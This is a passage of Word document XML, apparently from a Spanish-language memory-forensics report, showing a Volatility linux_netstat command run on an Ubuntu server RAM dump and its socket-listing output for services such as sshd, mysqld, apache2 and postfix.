        </w:rPr>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F26E7EA" w14:textId="77777777" w:rsidR="00FB41B7" w:rsidRDefault="00FB41B7" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB41B7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>sudo python2.7 vol.py --profile=LinuxlinuxUbuntu_4_15_0-1021-aws_profilex64 -f '/home/jrodg85/Server_RAM.mem' linux_netstat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="329BAC56" w14:textId="77777777" w:rsidR="00FB41B7" w:rsidRPr="00C9562B" w:rsidRDefault="00FB41B7" w:rsidP="00184E50">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9562B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="192F3F27" w14:textId="77777777" w:rsidR="00FB41B7" w:rsidRDefault="00FB41B7" w:rsidP="00FB41B7"/>
    <w:p w14:paraId="449681D3" w14:textId="77777777" w:rsidR="00FB41B7" w:rsidRDefault="00FB41B7" w:rsidP="00FB41B7">
      <w:r w:rsidRPr="006A2A95">
        <w:t>La respuesta de la consola es la siguiente:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CFF6081" w14:textId="77777777" w:rsidR="00FB41B7" w:rsidRDefault="00FB41B7" w:rsidP="00FB41B7">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C26216F" w14:textId="77777777" w:rsidR="00FB41B7" w:rsidRDefault="00FB41B7" w:rsidP="00FB41B7">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C9562B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DDD80BB"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Volatility Foundation Volatility Framework 2.6.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A064D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26653              systemd/1     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="554A77E2"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26655              systemd/1     /run/systemd/private</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E5EDC6"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439014             systemd/1     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23DF8226"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12401              systemd/1     /run/systemd/notify</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5090AEA4"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12402              systemd/1     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5988A451"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12403              systemd/1     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A148FFD"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674406             systemd/1     /run/systemd/journal/stdout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E4D193"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27271              systemd/1     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3248C720"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27272              systemd/1     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0BDE7C"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12487              systemd/1     /run/lvm/lvmpolld.socket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B62F5F1"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16183              systemd/1     /run/uuidd/request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E81EF8C"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16173              systemd/1     /run/acpid.socket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39CFB543"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12489              systemd/1     /run/systemd/journal/dev-log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7069984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96496              systemd/1     /run/systemd/journal/stdout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E043DA1"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45081              systemd/1     /run/systemd/journal/stdout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23BD0EF3"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43741              systemd/1     /run/systemd/journal/stdout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F3425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32383              systemd/1     /run/systemd/journal/stdout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D45CB91"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32104              systemd/1     /run/systemd/journal/stdout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="599F5516"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27373              systemd/1     /run/systemd/journal/stdout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50901DE9"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27010              systemd/1     /run/systemd/journal/stdout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D84338"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26769              systemd/1     /run/systemd/journal/stdout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A97916F"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13606              systemd/1     /run/systemd/journal/stdout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B34437"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18718              systemd/1     /run/systemd/journal/stdout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4CB33F"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18729              systemd/1     /run/systemd/journal/stdout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C853362"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18730              systemd/1     /run/systemd/journal/stdout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D10F29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18731              systemd/1     /run/systemd/journal/stdout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E388432"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18756              systemd/1     /run/systemd/journal/stdout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1934421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97213              systemd/1     /run/systemd/journal/stdout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D9251C"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16178              systemd/1     /run/snapd.socket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19715D18"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16180              systemd/1     /run/snapd-snap.socket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0D24DB"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12732              systemd/1     /run/udev/control</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C4BB5C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12878              systemd/1     /run/lvm/lvmetad.socket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F8A8E48"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16171              systemd/1     /var/run/dbus/system_bus_socket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7181301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lastRenderedPageBreak/>
        <w:t>UNIX 12417              systemd/1     /run/systemd/journal/stdout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041F4E62"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12419              systemd/1     /run/systemd/journal/socket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="400EBFAC"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12532              systemd/1     /run/systemd/journal/syslog</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10DBFA8F"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16191              systemd/1     /var/lib/lxd/unix.socket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622807F4"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13181              lvmetad/414   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C60AD6"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13181              lvmetad/414   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9A7C80"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12878              lvmetad/414   /run/lvm/lvmetad.socket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA6FC4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16470       systemd-logind/712   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2968C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16470       systemd-logind/712   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A5F948"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16548       systemd-logind/712   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47590836"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16630       systemd-logind/712   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9CDD47"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16785          dbus-daemon/720   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E1C895"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16785          dbus-daemon/720   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D8C32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16171          dbus-daemon/720   /var/run/dbus/system_bus_socket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C3DD39"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16822          dbus-daemon/720   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0AD20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16823          dbus-daemon/720   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06289DA2"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16824          dbus-daemon/720   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F33F4B7"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26801          dbus-daemon/720   /var/run/dbus/system_bus_socket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="673FF867"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43825          dbus-daemon/720   /var/run/dbus/system_bus_socket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C298526"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16827          dbus-daemon/720   /var/run/dbus/system_bus_socket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE5D4B3"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27245          dbus-daemon/720   /var/run/dbus/system_bus_socket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1DC553"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17410          dbus-daemon/720   /var/run/dbus/system_bus_socket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2427C304"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18201          dbus-daemon/720   /var/run/dbus/system_bus_socket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24713D55"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26654          dbus-daemon/720   /var/run/dbus/system_bus_socket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="274AA74B"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16917                 cron/733   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7600B1AC"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16917                 cron/733   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13AD13FD"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16999      accounts-daemon/734   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E4982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16999      accounts-daemon/734   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69AE797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17409      accounts-daemon/734   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6577C8E3"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17231                lxcfs/737   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F629EC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17231                lxcfs/737   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="457325B8"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18200              polkitd/771   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7AD85C"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26767      systemd-network/2788  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CCB3D6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26767      systemd-network/2788  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C00701D"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26789      systemd-network/2788  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D9E97D"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26796      systemd-network/2788  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DDF6242"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26797      systemd-network/2788  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC975EF"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26798      systemd-network/2788  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34BE4AAF"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26799      systemd-network/2788  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0343F4F8"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26800      systemd-network/2788  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="611975F4"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UDP      172.31.38.110   :   68 0.0.0.0         :    0                   systemd-network/2788 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28CF03C3"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27007      systemd-resolve/2804  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D00C75"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27007      systemd-resolve/2804  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="507ABC52"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27228      systemd-resolve/2804  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F976B23"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27244      systemd-resolve/2804  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF5CCEC"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">UDP      127.0.0.53      :   53 0.0.0.0         :    0                   systemd-resolve/2804 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C33DD7"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TCP      127.0.0.53      :   53 0.0.0.0         :    0 LISTEN            systemd-resolve/2804 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B286594"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27371      systemd-timesyn/2818  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17CDBE01"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27371      systemd-timesyn/2818  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AFEDAAB"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27393      systemd-timesyn/2818  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E17B5B4"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27396      systemd-timesyn/2818  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA27D3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27397      systemd-timesyn/2818  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AAAF4D0"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27398      systemd-timesyn/2818  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B7E81C4"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27399      systemd-timesyn/2818  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F450A81"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12417      systemd-journal/2825  /run/systemd/journal/stdout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B0C997"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12419      systemd-journal/2825  /run/systemd/journal/socket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47324759"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12489      systemd-journal/2825  /run/systemd/journal/dev-log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE80296"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27373      systemd-journal/2825  /run/systemd/journal/stdout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B82BD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43741      systemd-journal/2825  /run/systemd/journal/stdout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157731AD"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27010      systemd-journal/2825  /run/systemd/journal/stdout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B96768"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26769      systemd-journal/2825  /run/systemd/journal/stdout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC0C50B"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96496      systemd-journal/2825  /run/systemd/journal/stdout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D53FCA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97213      systemd-journal/2825  /run/systemd/journal/stdout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A117634"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674406     systemd-journal/2825  /run/systemd/journal/stdout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF07E4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13606      systemd-journal/2825  /run/systemd/journal/stdout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="772A793C"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32383      systemd-journal/2825  /run/systemd/journal/stdout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3379D93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18718      systemd-journal/2825  /run/systemd/journal/stdout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="648F453C"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18729      systemd-journal/2825  /run/systemd/journal/stdout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="675FED5B"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18730      systemd-journal/2825  /run/systemd/journal/stdout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66219EBD"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18731      systemd-journal/2825  /run/systemd/journal/stdout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D39AF8"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45081      systemd-journal/2825  /run/systemd/journal/stdout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AECDB8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18756      systemd-journal/2825  /run/systemd/journal/stdout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BAFD104"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27521      systemd-journal/2825  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F27F29"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32104      systemd-journal/2825  /run/systemd/journal/stdout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0539B6"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32103                uuidd/5077  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F83D196"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32103                uuidd/5077  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F0C327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16183                uuidd/5077  /run/uuidd/request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41FA0528"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32381        systemd-udevd/5160  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA4B343"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32381        systemd-udevd/5160  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C7DE21C"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12732        systemd-udevd/5160  /run/udev/control</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64584508"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32384        systemd-udevd/5160  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="295D1D39"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32388        systemd-udevd/5160  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7436DAF6"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32389        systemd-udevd/5160  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="777B059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43155               iscsid/10988 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4592D710"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43143               iscsid/10989 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D514CD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43153               iscsid/10989 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22FEA223"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43740      networkd-dispat/11199 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D9EE91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43740      networkd-dispat/11199 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7461D38D"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43824      networkd-dispat/11199 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67FDB624"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45080                 sshd/12159 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B416EE7"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">UNIX 45080                 sshd/12159 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68485601"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22 0.0.0.0         :    0 LISTEN                       sshd/12159</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A184625"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22 ::              :    0 LISTEN                       sshd/12159</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5047D4D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TCP      127.0.0.1       : 3306 0.0.0.0         :    0 LISTEN                     mysqld/5127 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EBDA01C"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90469               mysqld/5127  /var/run/mysqld/mysqld.sock</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB4481B"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TCP      0.0.0.0         :    0 0.0.0.0         :    0 CLOSE                     apache2/5469 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E3F306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TCP      ::              :   80 ::              :    0 LISTEN                    apache2/5469 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69312F0B"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TCP      0.0.0.0         :    0 0.0.0.0         :    0 CLOSE                     apache2/5469 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE69F5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TCP      ::              :  443 ::              :    0 LISTEN                    apache2/5469 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="107BF7D2"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96495                snapd/6219  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EDEE8A2"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96495                snapd/6219  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="488F9BA4"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16178                snapd/6219  /run/snapd.socket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4852C81B"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16180                snapd/6219  /run/snapd-snap.socket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD3925F"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97212      amazon-ssm-agen/6445  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A302D5"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97212      amazon-ssm-agen/6445  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B06153"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12532             rsyslogd/26254 /run/systemd/journal/syslog</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A926C9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439139            rsyslogd/26254 /var/spool/postfix/dev/log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E5DBD77"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439143            rsyslogd/26254 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3A76CB"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440157              master/26489 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66EC0743"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127.0.0.1       :   25 0.0.0.0         :    0 LISTEN                     master/26489</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07DF740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::1             :   25 ::              :    0 LISTEN                     master/26489</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2273E0FB"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440176              master/26489 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="528AB0E2"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440177              master/26489 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB0B4A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440178              master/26489 public/pickup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F10443C"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440179              master/26489 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E16A782"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440180              master/26489 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26250DDB"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440182              master/26489 public/cleanup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7691460C"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440183              master/26489 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E39431B"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440184              master/26489 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D02951"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440185              master/26489 public/qmgr</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DCDDF59"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440186              master/26489 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DFE016C"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440187              master/26489 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04894688"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440189              master/26489 private/tlsmgr</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21638F06"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440190              master/26489 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="037294D4"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440191              master/26489 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC42C9B"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440192              master/26489 private/rewrite</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F01ADD"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440193              master/26489 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B4360FC"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440194              master/26489 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02EC6F14"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440195              master/26489 private/bounce</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="436E0957"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440196              master/26489 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F69157D"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440197              master/26489 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D6A46CF"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440198              master/26489 private/defer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612B4A57"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440199              master/26489 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54CFCEF6"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440200              master/26489 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434387A9"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440201              master/26489 private/trace</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B84580"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">UNIX 440202              master/26489 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="084EF095"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440203              master/26489 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="577036A1"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440204              master/26489 private/verify</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06ECA8A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440205              master/26489 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="400F43FF"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440206              master/26489 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B056F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440207              master/26489 public/flush</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C062172"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440208              master/26489 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="323DDDB8"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440209              master/26489 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A6FA461"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440210              master/26489 private/proxymap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7801CA1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440211              master/26489 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B3D988"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440212              master/26489 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49AD2154"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440213              master/26489 private/proxywrite</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E47526"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440214              master/26489 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="046F0049"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440215              master/26489 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316A9CF4"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440216              master/26489 private/smtp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62140B77"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440217              master/26489 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3608B15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440218              master/26489 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06893486"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440219              master/26489 private/relay</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B0B632"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440220              master/26489 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E4A7AE0"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440221              master/26489 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A58ADA1"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440222              master/26489 public/showq</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1709D38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440223              master/26489 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F05AECC"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440224              master/26489 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="480FBB80"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440225              master/26489 private/error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E98ECD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440226              master/26489 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC32861"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440227              master/26489 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F1127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440228              master/26489 private/retry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135F2BFD"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440229              master/26489 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="452755F0"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440230              master/26489 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1118A78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440231              master/26489 private/discard</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E01A51"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440232              master/26489 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="255E96A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440233              master/26489 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C7516D"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440234              master/26489 private/local</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="518B8FA0"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440235              master/26489 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7211BC79"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440236              master/26489 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D785582"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440237              master/26489 private/virtual</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C753743"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440238              master/26489 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D5F9C7"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440239              master/26489 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26DC2BA0"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440240              master/26489 private/lmtp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="678254E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440241              master/26489 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E009344"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440242              master/26489 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="471E4DA7"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440243              master/26489 private/anvil</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7095D11D"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440244              master/26489 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E843062"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440245              master/26489 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7040FA56"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440246              master/26489 private/scache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D0B42D"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">UNIX 440247              master/26489 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9CCA6F"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440248              master/26489 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560EE4FB"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440249              master/26489 private/maildrop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14735750"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440250              master/26489 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E961A5"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440251              master/26489 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F53B8A7"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440252              master/26489 private/uucp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09DFC3F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440253              master/26489 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686DF11C"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440254              master/26489 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC7AE37"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440255              master/26489 private/ifmail</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73735529"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440256              master/26489 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A96F64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440257              master/26489 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C733A0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440258              master/26489 private/bsmtp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B868492"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440259              master/26489 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2298C775"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440260              master/26489 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A289511"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440261              master/26489 private/scalemail-backend</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61EB848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440262              master/26489 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23489A65"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440263              master/26489 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3357DCA0"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440264              master/26489 private/mailman</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CB7A7FD"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440265              master/26489 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB461C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440266              master/26489 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1843CB"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440187                qmgr/26500 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10EDB28B"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440185                qmgr/26500 public/qmgr</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E73246"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440388                qmgr/26500 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05806E9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apache2/19704</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B2045F1"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80 ::              :    0 LISTEN                    apache2/19704</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1027FE47"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apache2/19704</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6952A775"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443 ::              :    0 LISTEN                    apache2/19704</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22EF2027"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apache2/19705</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB13A2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80 ::              :    0 LISTEN                    apache2/19705</w:t>
